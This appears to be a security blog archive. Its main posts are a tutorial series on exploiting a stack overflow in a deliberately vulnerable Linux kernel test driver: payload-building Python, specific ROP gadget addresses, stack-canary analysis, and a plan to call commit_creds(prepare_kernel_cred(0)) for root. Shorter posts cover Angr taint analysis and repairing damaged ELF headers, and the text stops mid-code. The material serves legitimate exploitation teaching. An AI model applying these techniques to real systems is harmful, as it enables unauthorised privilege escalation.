k3170

[Linux Kernel Exploitation 0x2] Controlling RIP and Escalating privileges via Stack Overflow

2021-01-18T06:04:00.003-08:00

Previous Post in Series:

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html
[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x1-smashing.html
this post

Hi folks! I'm back and this time I've got a banger of a post; we're going to finish off the last part of the exploit chain for stack overflows. In the previous post we discussed some details of memory protections in the kernel and looked at what a few probes around some of the memory structures looked like. If you don't know how to debug a Linux Kernel, build one, or build a QEMU image, please check out the previous stuff in the series. In this post we're going to start really wielding our power over the stack, crafting ROP chains and calls to some interesting functions.

Controlling RIP (No Canary)

Target Driver: https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/debug_driver.c

The last time we discussed canaries we turned off CONFIG_STACKPROTECTOR and looked at the stack to confirm there was absolutely no protection. What I did after that, behind the scenes, was check whether VMAP_STACK has any significant impact, because initially my writes were triggering a ton of page faults! After that I made an adjustment to the driver: I changed target_buf to a fixed-size char buffer, "char target[16]". This seemed to make my stack smashing more reliable. So I again implore you to use the target driver for the following set of examples.

First let's find the length at which we start overwriting the return address, i.e. the value that ends up in RIP. This is not the best explanation, but to keep things simple my procedure was: increase the write length 1 byte at a time, check the kind of error triggered, and set a taint value like 0x43434343 at the end of the payload to see if it ends up in any registers or other interesting places when a fault is triggered.
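To make the procedure concrete, here is a minimal sketch of how the probe payloads could be generated. The function name probe_payloads and the "A" filler are my own choices for illustration and are not part of the author's tooling; each payload still has to be fed to the driver by hand while watching the debugger.

```python
def probe_payloads(max_len, taint=b"CCCC", filler=b"A"):
    """Yield (length, payload): `length` filler bytes followed by the taint marker.

    b"CCCC" is the byte string for the 0x43434343 taint value mentioned above.
    """
    for length in range(1, max_len + 1):
        yield length, filler * length + taint


if __name__ == "__main__":
    # Print a couple of the candidates; in practice you would try them one by one.
    for length, payload in probe_payloads(64):
        if length in (16, 48):
            print(length, payload)
```

When the taint bytes show up in a register or in the faulting address, the filler length of that payload is the distance to whatever got overwritten.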

Eventually this laborious process yielded a length of 48 characters, after which the bytes I write land exactly on the value that ends up in RIP. To demonstrate, check out this nifty screenshot:

GDB output showing that an address from our payload is actually executed in the kernel! We officially control execution woo hoo!

For those who want to recreate this using the stuff I set up for the test, you'll need to fire off this command, making sure your module is loaded and accessible:

./stacksmash_test_addr.sh 48 [address to execute]

If you want to see what ./stacksmash_test_addr.sh does, it's very simple: it takes a payload length and a hexadecimal address as input and spits out a string that we can use as a payload. Here's the code:

./stacksmash_app.elf `python -c '
import sys
address = sys.argv[2][2:]  # drop the leading "0x"
# one character per hex byte pair, reversed so the bytes land in little-endian order
address_string = "".join([chr(int(address[i:i+2], 16)) for i in range(0, len(address), 2)][::-1])
print("A" * int(sys.argv[1]) + address_string)' $LENGTH $ADDR` 10

I've tried to clean it up a bit, but honestly all I'm doing here is using some ugly python to convert a hexadecimal address into a format that ends up in memory properly. It's not crucial to understand everything that happens here because there are much less complicated ways to achieve this; I'm just trying to go through the most straightforward way possible so everyone can participate without requiring much background in kernel dev.
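One of those less complicated ways is to let Python's struct module do the byte-order work. The following is only a sketch and not the author's script: build_payload is a hypothetical helper name, and it assumes Python 3 and a 64-bit little-endian target.

```python
import struct
import sys


def build_payload(pad_len, address, filler=b"A"):
    """Return pad_len filler bytes followed by the 64-bit address, little-endian."""
    return filler * pad_len + struct.pack("<Q", address)


if __name__ == "__main__" and len(sys.argv) == 3:
    # usage (hypothetical file name): python3 build_payload.py 48 0xffffffff8124529d
    payload = build_payload(int(sys.argv[1]), int(sys.argv[2], 16))
    sys.stdout.buffer.write(payload)  # raw bytes, no text encoding applied
```

Writing through sys.stdout.buffer matters on Python 3, because print() would encode bytes above 0x7f as multi-byte UTF-8 and corrupt the address.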

In the above screenshot one should note that the breakpoint is set on a function weird enough that we know we are the ones triggering execution, because it may happen that you get all happy about triggering a ROP payload when it's just natural kernel noise hehe. Congratulations, you just controlled execution at one of the highest privilege levels available to a human being on a Linux computer! Fancy stuff! The next step is to start chaining together instructions that achieve a goal we want.

Privilege Escalation for Kernel Intruders

Before we do that let's lay out a game plan. There are any number of things we can do with these newly gained kernel powers, but let's try something simple: get root creds. So what we need to do is get the kernel to make our userland process insta-root! It turns out there are functions loaded into the kernel symbol table that literally do that:

prepare_kernel_cred(struct task_struct *daemon) is a function that generates a cred structure. We need this for our call to the next important function. I know it takes a weird task_struct thing but fret not, the documentation indicates that this can be NULL, which will essentially trigger some default option that gives us "full creds".
commit_creds(struct cred *) does the actual deed and installs the cred structure on our task.

So we need some Return Oriented Programming (ROP) chain that puts together a call like commit_creds(prepare_kernel_cred(0)), which means that in terms of assembler instructions we need:

an instruction chain that puts a null in rdi before we call prepare_kernel_cred. This is because, according to the calling convention, rdi holds the first parameter.
an instruction chain that grabs the returned cred structure (which will be a pointer in rax at this point) and sticks it in rdi before our call to commit_creds
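As a rough illustration of those two requirements, the sketch below lays out one common shape for such a chain as a sequence of 64-bit words. Everything here is an assumption for illustration: cred_chain is a hypothetical helper, the gadget types ("pop rdi ; ret" and "mov rdi, rax ; ret") may not exist in that exact form in a given kernel, and the addresses in the example are obvious placeholders rather than real ones.

```python
import struct


def cred_chain(pop_rdi_ret, prepare_kernel_cred, mov_rdi_rax_ret, commit_creds):
    """Pack a chain that models commit_creds(prepare_kernel_cred(0)).

    All four arguments are addresses you must find yourself for your own kernel.
    """
    words = [
        pop_rdi_ret,          # gadget: pop rdi ; ret
        0,                    # value popped into rdi (the NULL argument)
        prepare_kernel_cred,  # returns the new cred pointer in rax
        mov_rdi_rax_ret,      # gadget: move the returned pointer into rdi
        commit_creds,         # installs the creds on the current task
    ]
    return struct.pack("<%dQ" % len(words), *words)


if __name__ == "__main__":
    # Placeholder addresses only, to show the layout.
    chain = cred_chain(0x1111111111111111, 0x2222222222222222,
                       0x3333333333333333, 0x4444444444444444)
    print(chain.hex())
```

Note that the zero word contains NUL bytes, so a chain like this cannot be passed as-is through a command-line argument, which is a C string; a different delivery path or a different way of zeroing rdi would be needed.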

Beyond this there's also the problem of leaving the realm of the kernel to enjoy your new found powers in middle earth. Luckily for us there's a couple methods one can use to leave, each of them requiring something different of the stack and register value set.

We'll address this after our ROP chain is almost complete, so in summary, our plan so far is:

RIP Control: Find a write length that controls the RIP
ROP Chain: Build a ROP Chain that calls commit_creds(prepare_kernel_cred(0))
Return2Userland: Exit the kernel safely using iretq, sysretq, etc

Our overall plan will vary slightly depending on the protections available in the stack; for now let's keep it simple.

Building a ROP chain

We need a tool that will compile a list of ROP friendly instructions. I relied on ROPgadget.py; it seems to get the job done, although I'm sure there are tons of tools that will be able to handle this. Here's me dumping ROP gadgets for the kernel I'm attacking here (which is Linux 5.9.1):

Screenshot of some ROPGadget.py output after being run on the vmlinux image for our target Kernel.

Okay, so we need to pick up a couple of gadgets. To start, let's set up a little gadget to call any function pointer on the stack. Here are my candidates:

0xffffffff8124529d pop rbx ; ret
0xffffffff8230f2ff call rbx

Using these gadgets means we essentially want to pop something into rbx, which requires us to have something on the stack to pop; for us this means packing in the address of prepare_kernel_cred, which would basically look like this:

[AAA...*48][0xffffffff8124529d][prepare_kernel_cred][0xffffffff8230f2ff]

Okay, so we need to somehow use ./stacksmash_test_addr.sh to pack more than one address into the payload. I've tried more sophisticated ways and they are currently failing, so I've decided to stick with this clunky script for now. Anyway, here's how you stuff more than one address into the payload; call stacksmash_test_addr.sh as follows:

./stacksmash_test_addr.sh 48 0xffffffff8230f2ffffffffff81088be0ffffffff8124529d

This is going to prove a little tricky because of the default terminal line size on qemu, which I haven't figured out how to change yet. I'll update this once I do! Anyway, if you get this right, what should end up on your stack is the following:

Some gdb output confirming we actually are building a sane payload. Here I just grab the address of the buf parameter from a kernel mediated call to vfs_write; this helps me make sure I'm looking at the correct buffer, before the driver touches it.
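If the byte order of that long argument is hard to eyeball, a small check like the one below can help. It is only a sketch: the constant names are mine, and I am assuming (from the layout shown earlier) that 0xffffffff81088be0 is the address of the function being called in the author's build. It rebuilds the command-line argument from the three addresses and confirms that reversing it byte-wise, as the script does, gives the same bytes as packing the three addresses little-endian in stack order.

```python
import struct

POP_RBX_RET = 0xffffffff8124529d  # gadget: pop rbx ; ret
TARGET_FUNC = 0xffffffff81088be0  # assumed: the function pointer popped into rbx
CALL_RBX = 0xffffffff8230f2ff     # gadget: call rbx


def from_reversed_hex(hex_string):
    """Mimic the script: strip "0x", split into byte pairs, reverse the byte order."""
    digits = hex_string[2:] if hex_string.startswith("0x") else hex_string
    return bytes.fromhex(digits)[::-1]


# The argument lists the addresses last-to-first, because the whole string is reversed.
argument = "0x%016x%016x%016x" % (CALL_RBX, TARGET_FUNC, POP_RBX_RET)
stack_order = struct.pack("<3Q", POP_RBX_RET, TARGET_FUNC, CALL_RBX)

if __name__ == "__main__":
    print(argument)
    print(from_reversed_hex(argument) == stack_order)
```

The first quadword after the 48 filler bytes is therefore the pop rbx gadget, followed by the function address and then the call rbx gadget.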

And if you manage to actually run the sample payload here you should hit breakpoints that indicate you're in control:

That confirms that we are hitting the right notes and we can pretty much call any function now with this neat little gadget! What we need to do now is prepare a ROP chain to stick a NULL in rdi before we make the call to prepare_kernel_cred. Just a note on choosing gadgets: I would prioritize those that cause the least stack drama (some ret instructions specify an offset by which to bump the stack pointer, so watch out) and that affect as few registers as possible. But I suggest just trying stuff; you actually learn a lot from seeing gadgets not work!

I've been stuck at this point for a few weeks, so I'm going to cut my losses with this post and end it here; we'll prepare the rest of the payload in the next post. Enjoy!


[Linux Kernel Exploitation 0x1] Smashing Stack Overflows in the Kernel

2020-11-27T07:29:00.006-08:00

Previous Post in Series:

[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU https://blog.k3170makan.com/2020/11/linux-kernel-exploitation-0x0-debugging.html

Hi folks, this blog post is part of a series in which I'm running through some of the basics of kernel exploit development for Linux. I started off the series with a walkthrough of how to set up your kernel for debugging and included a simple debug driver to target. This post carries on from that point and explores some stack security paradigms in the kernel.

We're gonna add some stuff to that driver to make it do a dangerous memcpy and then look at whether we can manipulate memory structures with our input. I initially intended to cover full exploit to a root shell with this post but that proved a bit more challenging than I anticipated so I'm splitting this up into two posts. This one will cover almost everything right up to actually controlling the instruction pointer in the kernel and cover a good amount of detail on kernel memory protections for the stack and how they work. So if you'd like to learn more about that stay tuned!

gif showing the correlation between crashes that trigger a kernel fault (every time ssh connects). One can see the register data includes our payload! This was actually a heap overflow, not a stack based overflow, oops!

Getting Setup

We're going to progress through this just like any other stack smashing tutorial. I'm going to show you some vulnerable code, then we're going to experiment with some payload lengths until we get a crash and take it from there.

To do that we need to make sure we can actually trigger the vulnerable code and that means:

Having a driver script--that invokes the kernel functionality from userspace.
Having a kernel hooked up to a debugger in a relaunch-able vm with debug symbols and all the other configs we need - I explain how to achieve this in the previous post.
Having enough GDB fu to: (1) set a breakpoint, (2) inspect the stack and register values. If you want to follow along like a champ I suggest pausing here and trying to get that done; learn to do those two things and then move on.

*In the next few paragraphs I show you how to set a breakpoint in the kernel and inspect stack memory, because I lost this copy of the driver and I don't want to make multiple copies of the same code please treat these as tutorials for demonstration and try to recreate them on the version of the driver that wasn't lost.

Okay so if that's in place, we can setup our debugger just as we did in the previous post except we want a setup this time that is going to allow us to inspect the stack so we can actually see what our input is doing to memory. To achieve this we need to first hit the write functions, then look for a more precise breakpoint location so we can conveniently just peek at the stack without too much effort. Lets start with a break-point set for the beginning of the device write function---the one that does that dangerous copy_from_user*---, for us that's called stacksmash_dev_write, here's a quick reminder of how to get that going:

root@syskaller: cat /proc/modules [grab base address]

(gdb) add-symbol-file [PATH]stacksmash_driver.ko [base]

(gdb) break stacksmash_dev_write

Breakpoint 2 at 0x10: stacksmash_dev_write. (2 locations)

For those who need the recap "add-symbol-file" imports symbols from a specified object file, this is done so we have more semantic information while debugging. Next we set a simple breakpoint at stacksmash_dev_write.

* in case you haven't read the code or don't know what the module does, it's a pretty straightforward ioctl module with a write and read operation. It's based on the driver used in the previous post; the only difference is the write does a copy_from_user into a stack buffer without checking the incoming length.

Cool now we need to trigger the function, to do that we need to invoke the stacksmash_app.elf binary from our qemu target. So we ssh in to the instance, build the app elf and launch as follows:

$ cd [kernel_dir]/image/; ssh -v -i ./stretch.id_rsa -p 10021 root@localhost -o "StrictHostKeyChecking no"

...

root@syskaller: cd /home/
root@syskaller: gcc -o stacksmash_app.elf stacksmash_app.c
root@syskaller: insmod stacksmash_driver.ko
root@syskaller: ./stacksmash_app.elf "aaaaaaaa" 10

If all is well you should hit a breakpoint like so:

(gdb) c
Continuing.

Thread 1 hit Breakpoint 2, stacksmash_dev_write (filep=0xffff88806bc30640,
    buffer=0x9 <fixed_percpu_data+9> <error: Cannot access memory at address 0x9>,
    len=140726537215640, offset=0xffffc9000049feb8)
    at drivers/stacksmash//stacksmash_driver.c:96

Which means we are in a comfortable position to track down better breakpoints now.

To find a breakpoint we disassemble the stacksmash_dev_write function:

At offsets 0xffffffffa0000030 to 0xffffffffa0000039 we can see the driver prepping the arguments for copy_from_user, leaving us with:

rdx holding the size
rsi holding the source (our arg string of "a"'s)
rdi holding the destination

We choose some new breakpoints and set one just before the copy_from_user call and one just after. We do this so we can peek at the stack and find out how much damage the input did. To peek, we check the address that rdi points to before and after the copy_from_user call:

Okay, we have a full view of what we're doing here, this is good. Now, before we can start building exploits, let's talk about some of the Linux Kernel's security protections for stack memory, check which ones we have enabled, see how they work and craft an exploit around them.

*Also please note we're going to swap this driver out for another one that is again slightly modified to make exploitation a bit easier; here I made the mistake of not actually involving any stack variables! So please take this as a quick lesson in GDB fu and debugging kernel drivers, but if you'd like to follow on please switch to targeting this driver [https://gitlab.com/k3170makan/linux-kernel-exploit-development/-/blob/master/stacksmash_driver.c]. I hope this doesn't make it too hard to follow; I was also too lazy to re-do the screenshots hehe, they came out so neat!

Kernel Stack Memory Protection

Let's look at the stuff in the kernel that makes modern stack exploitation so difficult. I believe most of these are accessible via .config by prepending CONFIG_ to the name, and by using the ./scripts/config script:

STACKPROTECTOR: Exploiting a stack overflow requires writing past the end of a buffer into the pointers on the stack. The kernel adds stack canaries to be able to detect when the stack has been corrupted. This option controls this, but it depends on the config variable HAVE_STACKPROTECTOR, which means you need to make sure that is off if you want this one off. Another important thing to note is that this only tags functions when they "have an 8-byte or larger character array on the stack", which means there may be times a function doesn't get a stack protector for an equivalent stack write operation, or perhaps a stack write is imposed by a compiler optimization?
STACKPROTECTOR_STRONG: This option allows one to widen the heuristics used to add canaries to functions. If this is enabled, canaries will be added to functions if they merely have any local variables in an assignment operation, among other conditions.
INIT_STACK_NONE: It is easy to leak info from uninitialized memory in the kernel, e.g. a module uses an uninitialized memory pointer during an IOCTL, doesn't clear it or set it, but writes it back to the user through some craftable call chain or invocation. The problem is so common that there's a config option with sub-options for making sure __user marked variables used in kernel functions are initialized to 0. One can also mark heap objects like this. It obviously doesn't work out well for anyone making assumptions about non-null uninitialized values, but it certainly does solve a big problem.
VMAP_STACK: To help detect stack overflows the kernel community introduced something called a guard page. This whole technique is very similar to something called shadow memory, which is used to track memory behavior in static/dynamic analysis engines. The guard page is allocated by the kernel after the end of the stack region whenever a process is spun up for execution, and it triggers a fault when written to due to its page access rights. After this, folks figured out a way to skip over the guard page and make memory regions clash as they grow over each other. The method was first employed in an exploit famously known as Stack Clash, developed by the folks at Qualys. To address this, I believe VMAP_STACK was developed in order to allow the kernel to map stack addresses into the range of virtual memory addresses used by vmalloc. Because vmalloc ranges are physically non-contiguous, wrapping guard pages around stack memory became a lot easier, and guard pages became bigger so they are harder to skip over.
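To check which of these options a given kernel build actually has, one can read its .config file. The helper below is a minimal sketch under the assumption that the file uses the usual "CONFIG_NAME=value" lines for enabled options and "# CONFIG_NAME is not set" comments for disabled ones; config_state is a hypothetical name and the sample text is made up for the demonstration.

```python
import re


def config_state(config_text, names):
    """Map each option name (without the CONFIG_ prefix) to its value, or None if unset."""
    state = {name: None for name in names}
    for line in config_text.splitlines():
        match = re.match(r"CONFIG_(\w+)=(.*)", line.strip())
        if match and match.group(1) in state:
            state[match.group(1)] = match.group(2)
    return state


if __name__ == "__main__":
    # Made-up sample; in practice read the .config from your kernel build directory.
    sample = "\n".join([
        "CONFIG_HAVE_STACKPROTECTOR=y",
        "CONFIG_STACKPROTECTOR=y",
        "# CONFIG_STACKPROTECTOR_STRONG is not set",
        "CONFIG_VMAP_STACK=y",
    ])
    print(config_state(sample, ["STACKPROTECTOR", "STACKPROTECTOR_STRONG", "VMAP_STACK"]))
```

Options reported as None are either commented out as "is not set" or absent from the file altogether.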

We're not going to be turning any of these off just yet; it's important to know what the difficulties of exploitation are like in this state and then slowly remove protections to show how and why they work. Now that we know what a modern kernel stack looks like and what we need to dance around, let's see if we can overwrite some structures in memory.

Destroying Kernel Stack

Okay, now that we can write to memory let's try to make that write count. We need to change a small detail about our driver: instead of just making a huge copy_from_user, it now memcpy's the input string to a stack variable like so:

Another important change to mention is that from here on out I turned off KASAN, which can be done by making sure CONFIG_KASAN is not set when you compile your kernel. The reason is pretty simple, KASAN is annoyingly sensitive with memory and triggers panics long before you can actually see what you're doing.

We now need to load up the driver as before but we set some breakpoints that wrap the memcpy like this:

*having done this a couple of times now, I recommend only taking the breakpoint just after memcpy returns. This is more efficient if you know how to search through memory for the payload and other goodies.

And if we write 17 bytes to the stack for instance we should see the following happen:

*note the stack dump at the end, clearly we're hitting the right memory here.

Which results in the following kernel panic:

We're on the right track! A little worrying here: the kernel is saying stuff about "Kernel stack is corrupted", which means we are overwriting the kernel stack canary value that I mentioned in the section on memory protections. There are two approaches we can take here: 1) get rid of the canary: we can cheat and contrive an example with no such memory protections and explore how easy it is to exploit, or 2) leak the canary: we do another sort of cheating and add a flaw to our driver that leaks the canary value. We're gonna do both!

Lets make sure we know where the stack canary is though, I've shown a couple examples here---these are taken from the break point just after the memcpy is hit but I believe any breakpoint in the function should work:

And to boot, we can make 100% sure that we are actually looking at a stack canary value by looking for the following markers:

Usually they are tucked into the stack just before all the other stack frames from previous functions are shown.
Stack canaries almost always occupy a full register size with random looking bytes---this means comparing that position to different runs of the function.

And lastly, when you overwrite them with even one single byte, the kernel gets panicky talking about stack-protector stuff again:

In the above screenshot we can see two separate runs of the stacksmash_driver, the first one writes 16 bytes the second 17, note the difference in the behavior and stack layout. At offset 0xffffc90000015fea8 we can see the stack cookie overwritten by a single 0x41.
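The "compare that position across different runs" check can be done mechanically once you have two stack dumps of the same frame. This is only a sketch with made-up values: changed_slots is a hypothetical helper, and the two lists stand in for quadwords you would copy out of gdb yourself.

```python
def changed_slots(run_a, run_b):
    """Return the indices of stack words that differ between two dumps of one frame."""
    return [i for i, (a, b) in enumerate(zip(run_a, run_b)) if a != b]


if __name__ == "__main__":
    # Made-up quadwords: index 2 plays the role of the canary, the rest stay constant.
    first_run = [0x4141414141414141, 0x4141414141414141, 0x9f3c1d77a2b4e600, 0xffffffff812a0000]
    second_run = [0x4141414141414141, 0x4141414141414141, 0x51e08c3319d7aa00, 0xffffffff812a0000]
    for index in changed_slots(first_run, second_run):
        print(index, hex(first_run[index]), hex(second_run[index]))
```

A slot that changes between runs is only a canary candidate; other values can vary too, so the panic-on-overwrite test described above is still the confirmation.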

Cool we now are well versed at setting breakpoints, finding the stack canary and disassembling the binary so I will try to keep the screenshots a little simple from here on out while showing as much as is needed to make my point. The next step is to explore our options in terms of memory protection now that we can control our payload well and navigate memory structures to some extent.

No Canaries, No Cares

The first thing I'd like to experiment with is no stack protector options for the kernel at all. We can turn them off by issuing the following commands and re-making the kernel:

You'll notice that some options don't get turned off, just ignore them for now; there is a way to force them off but it involves scratching around with the Kconfig default values which can turn into a mess really quickly so I'm not going to advise that. Btw this build will take a while as well, obviously because it affects literally everything that runs in the kernel and requires recompiling everything!

Here's the behavior of the stack overflow when I write 17 bytes without CONFIG_STACKPROTECTOR and CONFIG_STACKPROTECTOR_STRONG:

See, no weird 64-bit values that look all strange and random. Also, when we check the function epilogues we don't see any compares or checks against the canary.

The next thing we need to do is try to corrupt some return pointers but that requires I actually know a little more about what I'm doing here so I'm gonna need a little break to git guud. Please watch this space for the next post.

Thanks for reading!


SporeCrawler : Binary Taint Analysis with Angr

2020-11-12T15:47:00.001-08:00

In this very brief post I'm going to share a tool I've built that does binary taint analysis using Angr. There really isn't much to talk about since the code is pretty readable and not complex, but I will also walk through a quick introduction to the concept and why it's cool. The post will include links to all the scripts used. I should mention that the tools used here are research tools: they have bugs, they don't always run so smooth and there's a bunch of cases they can't manage; but they do give you access to a pretty nifty technology, symbolic execution and taint analysis!

What is Taint Analysis?

Taint analysis is a program analysis method computer scientists and other researchers use in order to track the flow of data in a program. Essentially one does taint analysis to see which points in the program's execution are influenced by user input. This is nifty because it helps prune down source code analysis to the most relevant sections of code. It also obviously helps guide fuzzing toward more fruitful areas of the code too!

The script we're going to develop here simply prints out any dangerous C functions whose symbolic state is tainted by our input; this means a register, memory value, file descriptor, or any other part of the symbolic state was at some point dependent on our input.

Taint analysis comes in two variants: static, which is based purely on code and definition analysis, and dynamic, which relies on actual execution and instrumentation to collect information. Each approach has its own drawbacks. For instance, dynamic analysis, or any analysis that works purely by collecting live execution data, risks under-approximating behavior because it is only aware of the paths exercised by common inputs. The opposite is true for static methods: because they work only on source code or static definitions, they can often report more bugs or events than are practically possible. The work of some research is to prune and whittle down these results through various tricks and schemes, or to blend the methods together.

To keep things to the point, in this post we will only focus on easy static taint analysis. The good thing is that this approach is easy to implement and relatively accurate; it just suffers from a couple of drawbacks that are sometimes manageable for real world binaries. In future research I will hopefully provide some hacks to get Angr running a bit smoother for complex binaries.

Claripy Annotations for Taint Analysis

We're doing taint analysis by using claripy's Annotations. These are basically classes that you can use to tag symbolic vectors or AST elements. It turns out there's a special parameter included in the constructors of claripy.BVS objects that accepts an annotation class. For now we're going to just use blank instances of the base Annotation class in claripy.

Here's how you setup a symbolic execution run in Angr with an annotated ARGV input:

And then in the hooks we simply check if there's an annotated register. Bear in mind that under certain calling conventions rsi, rdi and other registers often hold pointers to parameters, so checking them for annotations first makes sense:

Now why would we want to use annotations? Well, when AST binary operations and others involve operands that are annotated, the annotation will be transmitted to the destination operand. This means we can track the data flow of input if we set a start taint on a value we know we control. Angr will handle symbolic execution of the binary for us. The rest of the work is simply developing hooks for the functions we would like to intercept or report on, and making sure the hooks can inspect their symbolic states for annotations.
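The propagation idea is easy to see in a toy model. To be clear, the sketch below does not use claripy or Angr at all: Value and hook_strcpy are made-up stand-ins that only imitate the behaviour described here, where a tag on an operand follows the result of every operation and a hook later inspects its argument for the tag.

```python
class Value:
    """A toy symbolic value that carries a taint flag through operations."""

    def __init__(self, name, tainted=False):
        self.name = name
        self.tainted = tainted

    def _combine(self, other, op):
        # The result is tainted if either operand is tainted.
        other_tainted = other.tainted if isinstance(other, Value) else False
        other_name = other.name if isinstance(other, Value) else repr(other)
        return Value("(%s %s %s)" % (self.name, op, other_name),
                     self.tainted or other_tainted)

    def __add__(self, other):
        return self._combine(other, "+")

    def __xor__(self, other):
        return self._combine(other, "^")


def hook_strcpy(dst, src):
    """Stand-in for a function hook: report whether the source argument is tainted."""
    return src.tainted


if __name__ == "__main__":
    argv1 = Value("argv1", tainted=True)  # the input we control
    local = Value("local")                # unrelated program data
    print(hook_strcpy(local, (argv1 + 4) ^ 0xff))
    print(hook_strcpy(local, local + 1))
```

In the real tool the symbolic execution engine performs the operations and the annotation plays the role of the tainted flag.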

I've tested SporeCrawler on real world binaries from my host machine as well as some simple litmus tests to make sure I'm not going crazy. Here's what a nice run of SporeCrawler looks like; gnuplot is the target binary here:

SporeCrawler has a couple options but it mostly serves to be a good example of implementing angr to do taint analysis, check out more about it here: https://gitlab.com/k3170makan/SporeCrawler.git

[ELF Necromancy 0x0 ] Tricks for Resurrecting dead ELF files

2020-11-11T17:59:00.008-08:00

This post is going to cover some stuff I learned while suffering through some rando keygen style reverse engineering CTFs. Basically, what do you do in order to patch up an ELF file if, say, some of the header information is lost, and can you do this using hexdump and hexedit alone? If you want to know how this turned out, stay tuned!

ELF files don't need all their bells and whistles in order to execute (barring some code that self inspects for some stuff). This means you don't actually need to specify all of the aspects of an ELF file in order to get it working: you can skip or provide false data for debug information and you don't even need working section header meta-data (we'll show an example later on). So naturally some CTF problems will exploit this as some cheap anti-debug, because GDB will not accept such a file either. So what are some things you can try to recover some information from an ELF file if someone's messed up the meta-data?

Recovering Section Meta-data

Okay so we have an ELF executable called dead.elf and it runs but we cannot debug it. The challenge is to fix up the binary so that gdb is nice to it.

Fixing up the binary will mean recovering section data and I won't introduce sections here. I've already done a post on these but I will mention some of the important parts to make understanding this post a bit easier. Sections are chunks of an ELF file that contain basically annotations (labels and type information) for other chunks of an ELF file. Your ELF files have a number of important sections holding special collections of code (.init and .fini), the symbol table, the bss section, the data section and other good stuff. In order to organize all of this information a couple of data structures and offset pointers are needed, namely:

ELF header field e_shentsize - showing the size of a single section header table entry
ELF header field e_shnum - showing the number of entries in the section header table
ELF header field e_shoff - showing the offset in the ELF file where the section headers begin.
Section Header Table - list of data fields for sections (offset, size, type, flags, all that spiel)
Section String Table .shstrtab - list of strings for labeling the sections in the Section Header Table.
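For reference, the three header fields in that list can be read straight out of the first 64 bytes of the file. This is a minimal sketch that assumes a little-endian ELF64 file; section_fields is a hypothetical helper name, and it simply unpacks the standard ELF64 header layout with Python's struct module.

```python
import struct

# e_ident[16], e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
# e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")  # 64 bytes in total


def section_fields(header_bytes):
    """Return the section-related fields of a little-endian ELF64 header."""
    fields = ELF64_HEADER.unpack_from(header_bytes)
    if fields[0][:4] != b"\x7fELF":
        raise ValueError("missing ELF magic")
    return {
        "e_shoff": fields[6],
        "e_shentsize": fields[11],
        "e_shnum": fields[12],
        "e_shstrndx": fields[13],
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as handle:
            print(section_fields(handle.read(ELF64_HEADER.size)))
```

On a damaged file these values are exactly the ones that will look wrong, which makes this a quick way to see what needs patching.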

Okay so obviously spotting those things in the hex dump will provide you some clues on putting together this puzzle.

To start off with, let's take a look at something very easy to spot in an ELF file, the Section String Table. Here's what the one for the /bin/bash ELF file looks like:

To confirm we are looking at the correct section of the file we can use readelf:

That's freakishly close to the section we guessed above. Another huge clue that this is probably our section string table is obviously the prevalence of section names! Now, if you've found this, you know something else, you know how many sections there are---probably, well a really good guess!

Here's the string table from our dead.elf binary:

I counted 24 distinct section names so I'm going with that!

This information means you can immediately specify the e_shnum---24 section names counted according to me---which helps but we still have more arcane symbols to find, before our ELF lives again! Next we should try and find the beginning of the section header table, if we guess this right then readelf should be able to interpret our sections neatly.
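Counting the names and writing the result into the header can both be scripted. The sketch below assumes a little-endian ELF64 file, where e_shnum is the 2-byte field at offset 0x3C of the header; count_section_names and patch_e_shnum are hypothetical helper names, and the string table in the example is made up.

```python
import struct

E_SHNUM_OFFSET = 0x3C  # position of e_shnum in an ELF64 header


def count_section_names(shstrtab):
    """Count the non-empty NUL-terminated strings in a raw section string table."""
    return sum(1 for name in shstrtab.split(b"\x00") if name)


def patch_e_shnum(elf_bytes, count):
    """Return a copy of the file contents with e_shnum set to `count`."""
    patched = bytearray(elf_bytes)
    struct.pack_into("<H", patched, E_SHNUM_OFFSET, count)
    return bytes(patched)


if __name__ == "__main__":
    table = b"\x00.symtab\x00.strtab\x00.shstrtab\x00.text\x00.data\x00"
    print(count_section_names(table))
```

Treat the count as a starting guess rather than a final answer: the section header table also contains a reserved empty entry at index 0, and linkers may let one name share the tail of another, so the true e_shnum can differ slightly from the number of visible strings.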

Now you may be super good at this and perhaps can just quickly find groups of bytes with your eye that match the format, but there are a couple of things I realized that could speed up the search:

The section header table entries have two fields with very similar values right after one another, namely sh_addr and sh_offset; these fields specify the virtual address of the section (where it will appear in memory) and the offset of the section in the file, respectively. The reason this has such low entropy during manual inspection is because one number will usually be a predictable offset from the other or likely be the same number repeated! There's a common pattern of sh_offset being at some 0xYYY and the sh_addr then at 0xDYYY, where 0xD is some number between 0x1 and 0xF. This is actually pretty easy to spot in a hex dump.

For Linux based ELF files, there is a noticeable pattern to the type fields, you would only see numbers from a small range. Typically you'll also see some SHT_NOTE sections. Also if the binary is compiled with GNU GCC it may slap in a familiar byte pattern into the sh_type field for its own meta-data, namely the .gnu.version section and its cousins.

example of the "familiar pattern" left in GCC compiled binaries, this is the GNU_HASH section. try to remember this pattern of bytes for later on 0xf6ffff6f

A good place to start the search is after the .shstrtab, in my experience, at least for Ubuntu/GNU GCC ELFs the section header table is usually placed there (this of course may vary by compiler and operating system). In fact the offset usually configured as the start of the e_shoff is actually just the first byte after the .shstrtab ends, which is usually a field of nulls and then the actual section header table.

The last point comes outta nowhere and I don't really have much justification in this post for saying it, so here are some samples showing that the section header table offset is often right after the section string table:

The screenshots above are for grep, please note the extract from readelf as before showing that the section string table begins at 0x3013c. In the dump we can see the end of the section string table and the beginning of the section header table, as confirmed by this screenshot:

hex(197216) = 0x30260, which is right where the .shstrtab ends for us! You're gonna hafta believe me that this is a common enough pattern, mostly because I'm not going to bloat my blog post with lots of repetitive examples.
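The "end of .shstrtab, some nulls, then the table" observation can be turned into a first guess for e_shoff. The sketch below assumes the null run is just alignment padding up to the next 8-byte boundary; that is my assumption about typical GNU toolchain output, not something this post proves, and guess_e_shoff is a hypothetical helper name.

```python
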